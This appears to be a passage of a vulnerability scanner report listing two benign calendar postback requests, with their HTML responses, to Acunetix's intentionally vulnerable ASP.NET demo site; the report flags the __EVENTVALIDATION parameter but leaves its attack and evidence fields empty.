Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1111 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,111 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8466&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgDAE%2BWeHtsIZGRkbXqPL0avBKupzc0Ak7q2%2ByXeYV8%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKJ0fXtAgLRp67yDgLQp%2BbjBwLcy%2BvqAgLcy%2BvqAgLcy9%2FTDwLcy9%2FTDwLcy%2FP2CALcy%2FP2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK%2BaMFAor5owUCivnX2QkCivnX2QkCivnL%2FAICivnL%2FAICivn%2FkwoCivn%2FkwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O%2F1QMCv5O%2F1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJb2F5i4g7eTH74T8ltRlcokbTScc%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:10:26 GMT Content-Length: 12504
Response Body - size: 12,504 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgDAE+WeHtsIZGRkbXqPL0avBKupzc0Ak7q2+yXeYV8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKJ0fXtAgLRp67yDgLQp+bjBwLcy+vqAgLcy+vqAgLcy9/TDwLcy9/TDwLcy/P2CALcy/P2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK+aMFAor5owUCivnX2QkCivnX2QkCivnL/AICivnL/AICivn/kwoCivn/kwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O/1QMCv5O/1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJb2F5i4g7eTH74T8ltRlcokbTScc=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">March 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:White" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8471')" style="color:Black" title="March 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8472')" style="color:Black" title="March 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8473')" style="color:Black" title="March 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8474')" style="color:Black" title="March 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8475')" style="color:Black" title="March 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8476')" style="color:Black" title="March 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8477')" style="color:Black" title="March 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8478')" style="color:Black" title="March 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8479')" style="color:Black" title="March 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8480')" style="color:Black" title="March 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8481')" style="color:Black" title="March 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8482')" style="color:Black" title="March 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8483')" style="color:Black" title="March 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8484')" style="color:Black" title="March 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1125 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,125 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8537&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgAAaKhpVtsIZGRk3EJhOvy0xiUQyMuh4s3GEGHsF9o%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKj1pqZAwLQp%2BbjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9%2BDiBQKN9%2BDiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2%2F3gkC5p2%2F3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC%2B6SdxQ8C%2B6SdxQ8C%2B6SxmAcC%2B6SxmAcC%2B6SlPwL7pKU%2FAvuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk%2FawJAvuk%2FawJAvukkcMCAvukkcMCAtzL4%2BgFAtzL4%2BgFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv%2FkPAtzLv%2FkPAtzL050HAtzL050HAtzLxzAC3MvHMALcy%2FvXCQLcy%2FvXCQLcy%2B%2FqAgLcy%2B%2FqAgLcy8PTDwLcy8PTDwLcy%2Ff2CALcy%2Ff2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA1C779dvUKtYDojJLvGTpE1%2F2Ryx
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:39:54 GMT Content-Length: 12416
Response Body - size: 12,416 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgAAaKhpVtsIZGRk3EJhOvy0xiUQyMuh4s3GEGHsF9o=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKj1pqZAwLQp+bjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9+DiBQKN9+DiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2/3gkC5p2/3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC+6SdxQ8C+6SdxQ8C+6SxmAcC+6SxmAcC+6SlPwL7pKU/Avuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk/awJAvuk/awJAvukkcMCAvukkcMCAtzL4+gFAtzL4+gFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv/kPAtzLv/kPAtzL050HAtzL050HAtzLxzAC3MvHMALcy/vXCQLcy/vXCQLcy+/qAgLcy+/qAgLcy8PTDwLcy8PTDwLcy/f2CALcy/f2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA1C779dvUKtYDojJLvGTpE1/2Ryx" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8527')" style="color:Black" title="May 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8528')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8529')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8530')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8531')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8532')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8533')" style="color:Black" title="May 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8534')" style="color:Black" title="May 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8535')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8536')" style="color:Black" title="May 16">16</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8537')" style="color:White" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8538')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8539')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8540')" style="color:Black" title="May 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8541')" style="color:Black" title="May 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8542')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8543')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8544')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8545')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8546')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8547')" style="color:Black" title="May 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
